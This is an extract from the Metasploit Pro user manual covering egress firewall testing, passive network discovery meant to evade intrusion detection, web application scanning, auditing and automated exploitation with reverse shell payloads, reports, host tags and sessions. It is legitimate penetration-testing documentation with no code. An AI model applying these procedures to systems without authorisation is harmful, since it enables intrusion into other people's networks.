10. From the Options area, select the Mask discovered passwords option if you want to obscure any passwords that the report contains. The report replaces the password with **MASKED** . By default, this option is disabled. You should enable this option if you plan to distribute the report.
11. Select the Email Report option if you want to e-mail the report after it generates. If you enable this option, you need to supply a comma separated list of e-mail addresses. Note: If you want to e-mail a report, you must set up a local mail server or e-mail relay service for Metasploit Pro to use. To define your mail server settings, select Administration > Global Settings > SMTP Settings. 12. Click the Launch button.
279
Segmentation and Firewall Testing MetaModule

When firewalls have badly configured or lax egress traffic filtering policies, they open the network up to attacks from reverse shells, data-exfiltration, and other forms of exploitation. In order to identify the open ports that allow outbound traffic and to verify that your egress filtering policies properly block traffic, you can run the Segmentation and Firewall Testing MetaModule. The MetaModule runs an Nmap SYN scan against an egress target to reveal the outbound ports that are open from an internal host. It identifies the state of the ports in your firewall based on the traffic received by the server. If the server receives the traffic, then the MetaModule flags the port as open. If the firewall blocks the traffic, the MetaModule flags the port as filtered. The MetaModule tags the remaining ports as unfiltered or closed depending on the their response to connections. After the MetaModule completes its run, it generates a report that provides you with a comprehensive look at port state distribution and unfiltered ports.
Egress Scan Target

The egress target, egadz.metasploit.com, is a server hosted by Rapid7 and has been set up to have all 65, 535 ports open. Each port is configured to respond with a single SYN-ACK packet. In its default configuration, the MetaModule initiates a port scan using Nmaps default 1000 most common ports; however, if you need to include additional ports, you can define a custom port range.
Port States
The Segmentation and Firewall TestingMetaModule uses the following states to categorize ports.
Open
A port is assigned an open state if it allows traffic out of the network and the EGADZ server receives it. An open state indicates that there is an application that is actively accepting TCP connections, UDP datagrams or SCTP associations.
Filtered
A port is assigned a filtered state if it drops the traffic before it reaches the desired port on the EGADZ server. It will not receive a response from the EGADZ server. Typically, a port has a filtered state if a dedicated firewall device, router rules, or host-based firewall software has successfully blocked the port from sending traffic.
Segmentation and Firewall Testing MetaModule
280
Closed
A port is assigned a closed state if it allows traffic through the port, but there is not an application or service bound to the port. A closed port can be used to determine if t a host is up on an IPaddress.
Unfiltered
A port is assigned an unfiltered traffic if it allows traffic through to the port, but it cannot be determined whether the port is open or closed.
Running the Segmentation and Firewall Testing MetaModule

2. Find the Segmentation and Firewall Testing MetaModule and click the Launch button.
The Segmentation and Firewall Testing configuration window appears. 3. From the Scan Config tab, choose one of the following scan target options:
l
Use default egress target - The MetaModule runs against the egress server that Metasploit has set up for testing outbound traffic.
281
Use a custom egress target - The MetaModule runs against a server that you have set up for testing outbound traffic. You can specify an IP or a fully qualified domain name. To learn how to set up a custom egress target, go to the Global Tools area located on the Projects page and download the Segmentation Target Setup Script. You can follow the instructions provided in the script to create a custom egress server.
4. From the Scan Config tab, choose one of the following port range options:
l
Use default nmap port set - Scans Nmaps 1000 most common ports. Use a custom port range option - Scans the range of ports that you define.
282
5. Click the Generate Report tab.The Report configuration form appears. 6. Enter a name for the report in the Report Name field, if you want to use a custom report name. Otherwise, the MetaModule uses the default report name.
7. From the Sections area, deselect any sections you do not want to include in the report. Skip this step if you want to generate all the report sections. 8. Select the Email Report option if you want to e-mail the report after it generates. If you enable this option, you need to supply a comma separated list of e-mail addresses. Note: If you want to e-mail a report, you must set up a local mail server or e-mail relay service for Metasploit Pro to use. To define mail server settings, select Administration > Global Settings > SMTP Settings. 9. Click the Launch button.
283
Passive Network Discovery MetaModule

A passive network scan stealthily monitors broadcast traffic to identify the IP addresses of hosts on the network. By initially running a passive scan, you can identify known hosts while evading network monitoring tools, such as intrusion detection systems (IDS). The data obtained from a passive network scan can be used to perform a targeted active scan with the Discovery Scan. The Passive Network Discovery MetaModule runs a live packet capture on a network interface to capture DHCP requests and ARP requests. If you want to have more granular control over the packet capture or you want to reduce the size of the packet capture, you can use Berkeley Packet Filters (BPF) to specify the types of packets that the MetaModule captures. The packet capture runs until it reaches the maximum Pcap file size or the time limit you have configured for the MetaModule.
Running the Passive Network Discovery MetaModule

2. Find the Passive Network Discovery MetaModule and click the Launch button. The Passive Network Discovery window appears.
284
3. From the Pcap Configuration tab, select the Network Interface Card (NIC) you want to use to capture traffic. Metasploit Pro automatically detects the interfaces that are available.
4. Use the sliders to define the following limits for the packet capture:
l
Timeout - The time limit for the capture, in seconds. Max File Size - The maximum file size for each file captured, up to 512 MB. Max Total Size - The maximum size of the entire Pcap file, up to 2 GB. This value must be larger than the Max File Size. Note: The packet capture runs until it meets the timeout limit or the maximum Pcap file size limit.
5. Click on the Filters tab. The Berkeley PacketFilters page appears. 6. Choose one of the following options, if you want to specify a BPF string:
285
Select Protocols from the following list - Choose this option if you want the MetaModule to automatically generate the BPF string based on the protocols and ports you have selected. The Passive Network Discovery MetaModule provides a list of the most common ports and services that you can choose from. After you select the protocols and ports for the BPF string, you can view the generated string at the bottom of the Filters page.
Manually enter a BPFstring - Choose this option if you want to manually define the BPF string. For more information on BPF syntax, visit http://biot.com/capstats/bpf.html.
286
5. Click the Report tab. The Report configuration page appears. 6. Enter a name for the report in the Report Name field, if you want to use a custom report name. Otherwise, the MetaModule uses the default report name.
7. Select whether you want to generate the report as a PDF, RTF, or HTML file.
287
9. Select the Mask discovered passwords options if you want to hide discovered credentials from the report.
288
11. Click the Launch button. When the MetaModule launches, the Findings window appears. It contains the statistics and task log for the MetaModule run. You can track the total number of packets, bytes, and hosts that the MetaModule captures in real-time.
After the MetaModule completes its run, you should go the Reports area to view the Passive Network Discovery Findings Report that the MetaModule generated. The report provides detailed information about the services and credentials that the MetaModule was able to capture for each host, as well as a graphical breakdown of the operating systems and services that were found.
289
MetaModule Reports
A report provides insight into an organization's security infrastructure. The goal of a report is to clearly convey the outcome of a penetration test to your readers . Each report in Metasploit Pro contains a high-level summary of results along with the technical details of the test. The report is organized into logical sections, which makes it easy to navigate and find key information. This is extremely useful in cases where you may need to share a single report across an organization. Since the audience may be a mix of a technical and non-technical readers, it is important that each report conveys data in a way that is useful and valuable to each type of reader. For example, senior management may want to quickly glance at the report, so a summary that visually relays the most significant information will most likely resonate the most with them. The IT or security teams, on the other hand, will be more interested in the technical details of the test, so they can mitigate any issues that were exposed by the test. In Metasploit Pro, each MetaModule includes a specialized report. Each report contains information that is specific to the MetaModule that generates it. Each time you run a MetaModule, it automatically generates a report that details its findings. The data within each report represents a static snapshot of a target network and can be used as a benchmark to measure an organization's security posture. The following reports are available for MetaModules:
l
FirewallEgress Testing Report Passive Network Discovery Report Known Credentials Intrusions Report Single Password TestingReport SSH KeyTesting Report Pass the Hash Report
Generating a Report for a MetaModule

Reports can only be configured and generated from the MetaModule configuration window. Since the configuration of MetaModules varies depending on the one you have selected, the following steps provide a general overview of how to enable report generation for a MetaModule: To enable report generation for a MetaModule: 1. Select Modules > MetaModules from the Main Menu. 2. Find the MetaModule that you want to run and click Launch.
MetaModule Reports
290
3. Click on the Generate Report tab. 4. Enter a name for the report in the Report Name field, if you want to use a custom report name. Otherwise, the MetaModule uses the default report name. 5. Choose whether you want to generate the report as a PDF, HTML, or RTF file. 6. From the Sections area, deselect any sections you do not want to include in the report. Skip this step if you want to generate all the report sections. 7. From the Options area, select the Mask discovered passwords option if you want to obscure any passwords that the report contains. The report replaces the password with **MASKED** . By default, this option is disabled. You should enable this option if you plan to distribute the report. 8. Select the Email Report option if you want to e-mail the report after it generates. If you enable this option, you need to supply a comma separated list of e-mail addresses. Note: If you want to e-mail a report, you must set up a local mail server or e-mail relay service for Metasploit Pro to use. To define your mail server settings, select Administration > Global Settings > SMTP Settings. 9. Configure the remaining options for the MetaModule, such as the scope of the test. When you are done, click the Launch button to run the MetaModule.
Firewall Egress Testing Report

The Firewall Egress Testing Report shows the distribution of critical and registered ports that were discovered.It also includes a detailed list of unfiltered and unregistered ports and an appendix that provides information about port states, services, and test results. You can view this report to quickly identify ports that allow outbound traffic and to determine whether or not your egress filtering policies work as intended.
291
ID 1 2 3
Report Section Title Page Project Summary Egress Summary Port State Distribution
Report Description The front page of the report. It includes the Rapid7 logo, product name, and a brief description of the report contents. Lists the project name and the user who generated the report. Lists the egress scan target used, port range scanned, and the run time for the test. Shows a graphical breakdown of the critical and registered ports that are opened, filtered, and closed. If no data is available, then the report does not show a graph. Lists all open critical ports that were not filtered by the firewall and provides additional information about each port, such as the port state, the service bound to the port, and the service description. Only the port state and port number are obtained from the firewall egress test; the service name and description are provided by the Internet Assigned Numbers Authority (IANA). If there is no data available, this section is not generated for the report. Lists all open registered ports that were not filtered by the firewall and provides additional information about each port, such as the port state, the service bound to the port, and the service description. Only the port state and port number are obtained from the firewall egress test; the service name and description are provided by the Internet Assigned Numbers Authority (IANA). If there is no data available, this section is not generated for the report.
Critical Non-Filtered Ports
Registered NonFiltered Ports
292
ID 7 8
Report Section Appendix: Resources Appendix: Report Generation Options
Report Description Provides additional information about port states, port groups, and services. Lists the options that were used to generate the report.
Passive Network Discovery Findings Report

The Passive Network Discovery Findings Report presents the data for a Passive Network Discovery MetaModule run. It provides a high-level statistical overview of the hosts and services that the MetaModule was able to stealthily discover. In addition to graphs and tables, the report provides details about the discovered hosts - including detailed information about the active services running on those hosts, such as port numbers, protocols, and port states.
ID 1 2
Report Section Title Page Project Summary
Report Description The front page of the report. It includes the Rapid7 logo, product name, and a brief description of the report contents. Lists the project name and the user who generated the report. Lists the packet capture details, such as the total capture time, number of packets captured, and the amount of data captured. The section also summarizes the number of hosts, services, and credentials the MetaModule discovered. Shows a graphical breakdown of hosts and services that the MetaModule discovered. If no data is available, then the report does not show a graph. Lists each host the MetaModule was able to discover and shows any ports it was able to enumerate. Lists the options that were used to generate the report.
Findings Summary
4 5 6
Host and Service Distribution Detailed Findings Appendix: Report Generation Options
Passive Network Discovery Findings Report
293
Auth MetaModule Reports

The Auth MetaModule Report presents the findings for a Known Credentials Intrusion, SSHKey Testing, Single Password Testing, or Pass the Hash MetaModule run. It includes tables and graphs that provide a high-level overview of the hosts and services that the MetaModule was able to authenticate with known credentials. In addition to graphs and tables, the report provides details about the hosts and services that the MetaModule was able to authenticate to- including information about the type of session that was opened, when the session was opened, and when the session was closed.
ID 1 2
Report Section Title Page Project Summary
Report Description The front page of the report. It includes the Rapid7 logo, product name, and a brief description of the report contents. Lists the project name and the user who generated the report. Lists the name of the MetaModule that was run, the test runtime, and the user name/password combination used to authenticate to a target range of hosts. If you enabled the Mask discovered passwords option when you configured the report settings, the report displays a masked password. The report also displays the number of hosts that the MetaModule targeted, the number of services that it attempted to log in to, and the number of successful logins it was able to obtain.
Findings Summary
Authenticated Hosts Shows a graphical breakdown of hosts and services that the MetaModule and Services was able to authenticate to. If no data is available, the report does not show Summary Charts a graph. Detailed Findings Appendix: Report Generation Options Lists the services and session details for each host that the MetaModule was able to authenticate to. Lists the options that were used to generate the report.
5 6
Auth MetaModule Reports
294
Chapter 13:
Web Scans on page 296
WebApplicationTests
To learn more about web application tests, read the following topics:
l
Web Application Assessment Report on page 305
Web Scans
A web scan is the discovery process that Metasploit Pro uses to spider web pages and applications to search for active content and forms. During a web scan, the web scanner requests links and pages and parses the HTML for data. After a web scan completes, Metasploit Pro shows you the web server used to host each URL, or web application, and the number of pages and forms that were crawled. When you configure a web scan, you should specify the maximum number of URL and page requests to control the duration of the web scan. By default, the maximum number of requests is set to 500 per web application. However, most web applications require up to 5,000 for complete site coverage. If you need more comprehensive site coverage, you should set the maximum number of requests to a value that satisfies your scan requirements. Just remember that the number of requests affects the time it takes the web scanner to complete. Additionally, you can set a limit on the amount of time that the scanner spends on each URL. You should set a time limit to reduce the scan time. Depending on the number of URLs that you are scanning, the entire web scan can be lengthy. When performing a web scan, you may need to configure the web scan configuration multiple times before you achieve the results that you want. Once the web application has been parsed, Metasploit Pro saves the data to the project. Youll be able to view the information for each web application, or URL, from the main Web Apps page.
Web Scans
296
Web Application Testing

Web application testing is the process that scans active web content and forms for vulnerabilities, such as remote code execution, cross-site scripting, and SQL injection vulnerabilities, and matches exploits to identified vulnerabilities. In Metasploit Pro, web application testing is a three part process. 1. Scanning - The scan engine crawls and enumerates the web application. This process identifies the URLs and IP addresses that are available for auditing. 2. Auditing - The scan engine identifies vulnerabilities that exist in the targeted web application, web server, and related databases. 3. Exploitation - Metasploit Pro automatically generates an exploit map, or an attack plan, based on the vulnerabilities identified during the audit. Once the attack plan has been created, Metasploit Pro launches the relevant modules against the identified vulnerabilities and attempts to exploit the web application. .
Web Scan Options

You can configure the following options for a web scan:
l
URLs - Defines a list of URLs that the web crawler uses as a starting point. To specify a custom virtual host, prefix the name to the address and add a comma to separate name from the address. For example, use intranet,http://192.168.0.1. Maximum requests - Defines the maximum number of pages that the web crawler requests for each web page. Time limit - Defines the maximum amount of time, in minutes, that the web crawler spends on each web site. Concurrent requests - Defines the maximum number of concurrent requests that can be sent per site. HTTP user name - Defines the user name that the web crawler uses to authenticate each request. HTTP password - Defines the password that the web crawler uses to authenticate each request. HTTP cookie data - Sets the seed for the initial cookie for each request. HTTP user agent - Defines the user agent that the web crawler sends in each request.
Authenticated Web Scans

Metasploit Pro supports authenticated web application scans with Basic, Digest, Negotiate, and NTLM authentication types. When you supply a user name and password combination, Metasploit Pro uses the appropriate authentication type to automatically authenticate to the remote host. If the server supports multiple authentication types, then Metasploit Pro chooses one based on the following order:
l
Basic Digest Negotiate NTLM
To enable automatic authentication, you must define the HTTP username and HTTP password fields under the Advanced Web Crawler Settings on the web application scan configuration page. You can only define one user name and password combination per web scan.
Creating a URL Blacklist for Web Scans

A URL black list defines the URLs in the web application that you do not want to scan or crawl.To create a URL blacklist, you can define URLs or you can use wild card expressions. A URLblacklist can consist of both URLs and wild card expressions. A wild card expression is a regular expression that defines the pattern that the web crawler uses to identify blacklisted URLs. If you define wild card expressions in the blacklist, the crawler performs a match against each URL it finds. If the crawler finds a match, it does not submit a request for the URL. Instead, it reports that it found the URL and moves onto the next one.
Authenticated Web Scans
298
For example, if you want to skip all URLs that contain private in the file path, you can specify */private* as the URL pattern. When the crawler encounters a URL, like http://your.domain.com/private, it skips the URL.
To create a URL blacklist for a web scan:

1. From within a project, click the Web Apps tab. The Web Application page appears. 2. Click the Web Scan button.The New Web Application Scan page appears. 3. Find the URLaccess area. 4. In the URL patterns that shouldn't be accessible to guest web traffic field, use one of the following methods to add URLs:
l
Define URLs - Enter the URLs that you do not want to scan or crawl. Define Wild Card Expressions - Enclose the URLpattern that you want to use between two asterisks (*). Each URLpattern must be on a new line. For example, you can specify */admin* to blacklist any URLs that contain the word admin in the URL path.
Enabling Secure Socket Layer Checks for Web Scans

To run a web scan with automatic Secure Socket Layer (SSL) checks, you need to enable the Report if SSLis not enabled and Report if weak SSL ciphers are allowed options. These options are both available under the Transport Layer Security settings on the web application scan configuration page.
When these SSL options are enabled, the web scanner reports a vulnerability when a web server is not running over SSL. If the web server is running SSL, the web scanner checks for weak cryptographic ciphers. If weak ciphers are allowed, the web scanner reports a vulnerability against the web server.
Running a Web Scan

1. From within a project, click the Web Apps tab. 2. When the Web Applications page appears, click the WebScan button. 3. When the New Web Application Scan page appears, enter the URLs that you want the web crawler to crawl in the URLs field. Note: If you need to enter an IPv6 address, you must enclose the address in parenthesis. For example, use http://[fde2:b7c5:94b2:ffaa:20c:29ff:fe6c:ebdb].
299
4. Configure the web app scan options. Basically, you need to set a limit on the number of pages and links that the web scanner requests and the maximum amount of time that the web scanner spends on each web application. This number may need to be adjusted in subsequent scans in order to obtain the level of site coverage that you desire. Most web applications may need up to 5,000 requests. 5. Additionally, you can supply credentials that the web scanner uses to authenticate each request. 6. When you are ready to run the web app scan, click the Launch button.
300
Web Audit
A web audit is the process that identifies vulnerabilities that exist in the web application. The web scanner parses the information that was collected for the web application and uses that information to crossreference vulnerability information. A web audit can discover the following classes of issues: XSS, SQL Injection, and LFI/RFI. If a vulnerability is identified for a web application, Metasploit Pro provides the following information for the affected website:
l
Host IP Web application URL Vulnerability category Vulnerability name Vulnerability rank Vulnerability description Vulnerability method Vulnerability parameter Vulnerable form data Vulnerability proof
Web Audit Options

You can configure the following options for a web audit:
l
Maximum request/form - Determines the maximum number of requests that the web audit requests for each form. Time limit/form - Determines the maximum number of time, in minutes, that the web audit spends on each form. Instance limit/form - Determines the maximum number of unique for instances that the web audit tests. HTTP user name - Defines the user name that the web audit uses for authentication for each request. HTTP password - Defines the password that the web audit uses for authentication for each request. HTTP cookie data - Sets the seed for the initial cookie for each request. HTTP user agent - Defines the user agent that the web audit sends in each request.
Web Audit
301
Running a Web Audit

Before you can run a web audit, you have already run a web scan for the project. The project must contain a list of enumerated web applications and any 1. From within a project, click the Web Apps tab. 2. When the Web Applications window appears, click the Audit Web Apps button. 3. When the New Web Application Audit window opens, configure the web application audit settings. At a minimum, you should set the maximum number of requests/forms that the web crawler sends to each web application form and define the time limit that the audit should spend on each form. 4. Additionally, if you have credentials that you want the web scanner to use to authenticate the request, you can specify them in the HTTP user name and HTTP password fields. 5. To choose the URLs that the web scanner audits, you can click on the Show Advanced Options button. A list of all web applications available for auditing will display. By default, all the web applications will be selected. You can deselect any web applications that you do not want to include in the audit. 6. Launch the web audit.
Web Audit
302
Web Application Exploit

After you perform a web scan and a web audit, you are ready to exploit the web application. When you exploit a web application, Metasploit Pro automatically builds an attack plan based on the vulnerability information that was identified for the web application. The attack plan maps each vulnerability to a matching exploit and builds a queue of modules that Metasploit Pro intends to run against the web application. Configuring exploits for a web application is similar to configuring an automated exploit. You need to define the timeout value, payload type, connection type, and listener ports for the exploit. Additionally, if you have credentials that you want to use to authenticate each request, you can provide that information in the HTTP username and HTTP password fields.
Web Application Exploit Options

You can configure the following options for web application exploits: Timeout in Minutes - Defines the maximum amount of time, in minutes, that the system allocates to each exploit. Connection Type - Defines the payload type for each exploit. Payloads include:
l
Reverse - Initiates a connection from the target system to the attacker. Bind - Forces the target to open a listening port on the target system. Auto - Selects the best method for the attacker to create a connection to the target system.
Running Exploits Against a Web Application

1. From within a project, click the Web Apps tab. 2. When the Web Application window appears, click the Exploit Web Apps button. 3. When the Exploit Web Applications window appears, enter the maximum of time you want Metasploit Pro to spend on each exploit in the Timeout field. Enter the time in minutes. 4. In the Obtain one session per target and Skip targets with sessions fields, enter true if you want Metasploit Pro to bypass a target with an open session. Enter false if you want Metasploit Pro to attempt to obtain more than one session per target. 5. From the Payload type dropdown, choose the payload type for the exploits. You can choose between Meterpreter and command shell. 6. From the Connection type dropdown, choose the connection type for that you want the exploits to use.
303
7. In the Listener Ports field, specify the range of ports that should be used for reverse connect back payloads. 8. If you have credentials that you want to use to authenticate your HTTP requests, you can provide them in the HTTP username and HTTP password fields under the Web Application Identification Settings area. 9. From the Target Web Vulnerabilities area, select the vulnerabilities that you want to exploit. By default, all known vulnerabilities are selected for you. 10. When you are done configuring the exploitation settings, launch the attack.
304
Web Application Assessment Report

The Web Application Assessment Report is a comprehensive document that details the findings of a web application test. It contains graphical summaries that help you quickly understand the scope of the test and the data that the web scanner collected. The purpose of the report is to help you identify vulnerabilities in web applications and see how they correlate to OWASP application risk categories. For each identified vulnerability, the report shows the site information and the data used as proof text for the vulnerability. Remediation advice is provided in the appendix for Local File Inclusion (LFI), Remote File Inclusion (RFI), Cross-Site Scripting (XSS), SQL Injection (SQLi), and Publicly Writable Directory (PWD) vulnerabilities.
Web Application Assessment Report Sections

The Web ApplicationAssessmentReport includes the following sections: Engagement Scope OWASP Top 10 Web Application Security Risk Summary SummaryGraphs Vulnerability Details Remediation Advice Glossary Report Options
Web Application Assessment Report Engagement Scope

Provides a statistical overview of the web application test findings.
Web Application Assessment Report
305
Web Application Assessment Report Summary Graphs

Provides a graphical breakdown of the vulnerabilities that were identified and categorizes the findings based on operating system and OWASP category.
306
307
OWASP Top 10 Web Application Security Risk Summary

Provides an overview of the failures that were detected in OWASP 2013 categories.
Web Application Assessment Report Vulnerability Details

Identifies the vulnerability, provides the site information, and shows the data that was used to find the vulnerability.
OWASP Top 10 Web Application Security Risk Summary
308
Web Application Assessment Report Remediation

Provides information on how to reduce the risk and impact of web application vulnerabilities.
Web Application Assessment Report Remediation
309
Web Application Assessment Report Glossary

Provides definitions for some of the most commonly used terms in the Web Application AssessmentReport.
Web Application Assessment Report Glossary
310
Web Application Assessment Report Options

Lists the options that were used to generate the report.
311

When you generate the Web Application Assessment Report, there are several options that you can configure to customize the report. The following sections describes some of the options that you may want to utilize when you generate the report:
l
Including and Excluding Report Sections E-mailing the Web Application Assessment Report Naming the Web Application Assessment Report Ordering the Vulnerabilities in the Web Application Assessment Report
Naming the Report

Metasploit Pro uses the report type and task ID to name the report. For example, the default name for the Web Application Assessment Report is Webapp_assessment-TaskID. To change the name, you need to replace the default name in the Report Name field on the New Report form.
Including and Excluding Report Sections

By default, the Web Application Assessment Report includes all sections that are available for the report type. To include or exclude sections from your report, find the Report Sections area on the New Report form. You will see a list of all the sections that are available in the report, such as the Executive Summary, Engagement Scope, OWASP Status, SummaryGraphs, andVulnerability Details sections, as well as
312
appendices for the report. Any sections that have a marked check box will automatically be included in the report. To remove any sections, deselect the check box.
Ordering Vulnerabilities By
By default, if Metasploit Pro identifies vulnerabilities during a web application test, it will list the vulnerabilities by category in the Web Application Assessment Report. You can change the information that Metasploit Pro uses to sort the vulnerabilities. Reports can be sorted by the following information:
l
Category Host OWASP Path Risk VHOST
E-mailing the Generated Report

Metasploit Pro enables you to automatically e-mail a report after it is generated. To e-mail a report, you need to enable the E-mail report option on the New Report form and specify the emails that you want to send the report to. The e-mails that you specify must be comma separated. Additionally, before you can e-mail a report, you need to set up the SMTP settings through the Global Settings. If you do not have a global SMTP server set up, go to Administration > Global Settings > SMTP Settings. You will need to provide Metasploit Pro with the information for your mail server. This information includes the credentials that Metasploit Pro will need to authenticate to the mail server and the domain and SMTP port information for the mail server.
Generating a Web Application Assessment Report

1. From within a project, choose Reports > New StandardReport.
2. When the New Report form appears, click the Report type dropdown and choose Web ApplicationAssessment .
313
3. From the Web Application Assessment Report Format options, choose the format you want to use to generate the report. The most commonly used format is PDF.
4. In the Report Name field, enter the name that you want to assign to the report. This is the name that displays in on the Reports page in the Metasploit Pro and the name that the system uses to save the report. You can choose to use the default naming convention, which uses the report type as the report name and appends the report name with the task number.
5. From the Report Sections options, deselect any report sections that you do not want to include in the report. By default, all sections are included.
6. Click the Order vulnerabilities by dropdown and select the value you want to use to sort the vulnerabilities.
314
7. If there are any hosts that you want to explicitly include or exclude from the report, use the Included addresses andExcluded addresses field to specify the addresses of those hosts.
8. If you want to e-mail the generated report, you can select the E-mail report option and enter a comma separated list of the e-mail addresses that you want to send the report to. Note: If you choose to e-mail the report, please make sure that you have the SMTP settings configured through the Global Settings.
315
9. Click the Generate button to create the report. The Task Log appears and shows you the progress of the report generation. 10. When the report generation is complete, select Reports >Show Reportsto view a list of reports stored in the project. 11. Find the report you just generated. You can either view the report directly through your browser or you can download the report and save it to a location on your system.
Viewing Web Vulnerability Details

Metasploit Pro provides the following details for found web vulnerabilities:
l
Application URL - The URL where the vulnerability was found. Vulnerable Host - The fully qualified domain name of the vulnerable web application. Vulnerability Category - The Metasploit web vulnerability category to which the vulnerability belongs. Metasploit web vulnerability categories include Publicly-Writable-Directory, XSS, LFI,RFI, SQLi, and Version. Vulnerability Name- The name of the identified vulnerability. Vulnerability Risk - Identifies the likelihood of the vulnerability being exploited and measures the impact that exploitation will have. The vulnerability risk can be low, medium, or high. Vulnerability Confidence - The level of certainty that the vulnerability exists. If the exploit was able to force the page to include a remote file, the confidence level will be 100%. If it was able to invoke an error, the vulnerability level will be 75%. Vulnerability Description - Provides a description of the vulnerability. Vulnerable Method - The HTML request used. Vulnerable Parameter The parameter in the request that can be used to manipulate data. Proof - Provides the data that was used to prove the existence of a vulnerability.
To view the details for a vulnerability:

1. From within a project, click on the Web Apps tab. 2. Find the Website column and locate the site that contains the vulnerability that you want to view. 3. Click on the site link to open the Vulns page. The Vulns page shows the details for the site.
Web Vulnerability Categories

Metasploit Pro categorizes applications and vulnerabilities into the following categories:
Viewing Web Vulnerability Details
316
Version - TikiWiki, awstats, basilic, cacti, coppermine, joomla, mybb, oscommerce, php-xml-rpc, tikiwiki1.9.8, tikiwiki8.3, wordpress, xss CMDi - cmd, eval Publicly Writable Directory - http_put LFI - LFI RFI -RFI SQLi - sqli_blind_mysql, sqli_blind_postgres, sqli_blind, sqli XSS - XSS
Vulnerability Proof Text

Vulnerability proof is text that provides evidence of the existence of a vulnerability. You can view the proof text for each vulnerability in the Web Application Assessment Report or from a website's Vulns page. The type of proof text depends on the module that logged the vulnerability. The following vulnerability categories and text proof are available:
l
Command Injection - Executes the id command on a *nix system and looks at the output in the HTTP response. Uses the output as proof text. Direct Object Reference - Uses the URL of insecurely exposed resources as proof text. Local File Inclusion - Attempts to include a file from the server's file system and searches for the contents of that file. If the content is found, it is used as proof text. PHP Code Evaluation - Uses PHP code to add two random numbers and searches for the product in the response. If the product is found, it is used as proof text, in addition to some parts of the HTTP response. Remote File Inclusion - Attempts to add a remote file to the server's file system and searches for the contents of that file. If the content is found, it is used as proof text. SQL Injection - Shows an excerpt of the error message as proof text. SQL Injection (blind variant using differential analysis) - Displays "Boolean manipulation" because there is no proof text to display. Unvalidated Redirect - Displays the response headers as proof text. XSS - Shows an excerpt of the HTML code that contains the element that was injected as proof text. CSRF - Shows the HTML for the vulnerable form as proof text. The HTML may not match the original HTML because it is sanitized before it is parsed. Publicly Writable Directory - Uploads a file that contains a random string. If the file upload is successful, the random string will be used as proof text. Unauthorized Access - Displays the URL of the insecurely exposed path as proof text.
Vulnerability Proof Text
317
Chapter 15:
Host Tags
To learn more about host tags, read the following topics:

l
About Host Tags on page 320 Components of a Host Tag on page 320 Host Tag Tasks on page 322
About Host Tags

A host tag is an identifier that lets you easily search for hosts, organize assets, create work queues, and track findings for automatic inclusion in reports. For example, if you import scan data from multiple sources, such as Nexpose and Qualys, you may need a way to easily identify the hosts that are from Nexpose and the hosts that are from Qualys. As you import the Nexpose data, you can set the option to automatically apply a host tag, like nexpose_host, to every host. The same goes for the Qualys hosts, except you would use a host tag like qualys_host. There are a couple of ways to create a tag. With the first method, you create the host tag, search through existing hosts, and manually apply the host tags. The second method, mentioned earlier, is automatic tagging. You can only use automatic tagging for new data imports or discovery scans. There is an option that you can select that enables Metasploit Pro to automatically tag hosts as it imports or discovers them. There is no limit on the number of host tags that you can apply to a host. Therefore, you can apply as many host tags as you need to create the types of search queries that you need. After you tag the hosts, you can search for a specific host tag, which will return a list of hosts that match the search criteria. In this example, if you search for nexpose_host, you will see a list of the Nexpose hosts that you imported. This is useful if you know that you want to run an exploit against a certain type of host and do not want to spend the time sorting through hosts and manually selecting them from the Hosts page.
Components of a Host Tag

A host tag consists of a word or phrase that contains no spaces, a description, and three attributes.
Host Tag ID
The host tag ID, or simply host tag, consists of a single word or phrase with no spaces. Use a special character, like the underscore, to separate words. For example, you cannot use nexpose hosts, but you can use nexpose_hosts.
Description
The description describes the purpose of the host tag. For example, if you use host tags to identify different subnets, you can add a description to help you understand the purpose of the subnet. An example of a description is: Tags any hosts that are part of the IT teams subnet.
About Host Tags
320
Host Tag Attributes

You can assign attributes to indicate whether or not the tagged hosts should display in the generated report. Use the following attributes to determine how reports handle hosts that are tagged with the host tag:
l
Include in summary report - Provides information about the host in the Executive Summary section of the report. Include in report details - Provides information about the host in the Detailed Findings section of the report. Critical finding - Marks the host information as critical.
Components of a Host Tag
321
Host Tag Tasks

You can perform the following tasks with host tags: Creating a Host Tag Deleting a Host Tag Applying a Host Tag Automatically Tagging Hosts
Creating a Host Tag

1. Click the Analysis tab.
2. Click the host IP address.
3. Click the Tags tab.
4. In the Name field, enter a name for the tag.
Host Tag Tasks
322
5. In the Description field, enter a description for the tag.
6. Enable any of the following options: Include in report summary, Include in report details, and Critical Finding.
7. Click the Save button. .
Deleting a Host Tag

1. From within a project, click the Analysis tab. 2. When the Host window appears, click the host IP address to open the host details window. 3. Click the Tags tab.
Deleting a Host Tag
323
4. Locate the tag you want to delete and click Remove. 5. When the confirmation window appears, click OK to delete the host tag. 6. Save the tag.
Applying a Host Tag

1. From within a project, click the Analysis tab. 2. Select the host you want to tag.
3. Click the Tag button.
4. Search for the tag you want to use. If you need to create a tag, you can enter the tag name in the search field, and Metasploit Pro will automatically create and apply the tag.
5. Click the Tag button.
Applying a Host Tag
324
Updating a Host Tag

2. When the Host window appears, click on the host IP address to open the host details window.
3. Click the Tags tab.
4. Under the Update Tags area, locate the tag you want to edit. 5. Edit the description and any of the tag attributes.
6. Save the tag.
Updating a Host Tag
325
Automatically Tagging Discovered Hosts

1. From within a project, click the Analysis tab. 2. When the Host window appears, click the Scan button.
3. When the Discovery Scan window appears, click the Advanced Options button. 4. Select the tags that you want to enable for automatic tagging.
5. Launch the scan.
Automatically Tagging Imported Hosts

1. From within a project, click the Analysis tab. 2. When the Host window appears, click the Importbutton.
3. When the Import window appears, click the Browse to find and select the XML or ZIP file that you want to import into Metasploit Pro. 4. Under the Automatic Tagging area, find the tags that you want to enable for automatic tagging.
Automatically Tagging Discovered Hosts
326
5. Click the Import Data button.
Searching for Hosts by Host Tag

To search for hosts, you can append the hash symbol to the prefix of the tag. For example, if you search for #nexpose_import, Metasploit Pro returns all hosts that have been tagged with the nexpose_ import tag.
Searching for Hosts by Host Tag
327
Chapter 16:
Sessions
To learn more about sessions, read the following topics:

l
About Sessions on page 329 Active Sessions on page 330 Session Tasks on page 332
About Sessions
An active session provides a connection between the target system and the attacker. Metasploit Pro opens an active session if it can gain access to the host and run a successful attack. After you gain obtain an active session, you can use the active session to take control of the target system.
About Sessions
329
Active Sessions
